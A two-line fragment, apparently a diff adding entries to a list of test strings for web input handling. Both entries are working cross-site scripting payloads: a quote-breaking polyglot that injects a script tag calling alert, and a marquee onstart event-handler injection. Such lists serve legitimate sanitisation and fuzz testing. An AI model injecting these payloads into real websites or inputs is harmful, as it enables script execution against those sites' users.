+ ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2697
+ <marquee onstart='javascript:alert('1');'>=(◕_◕)=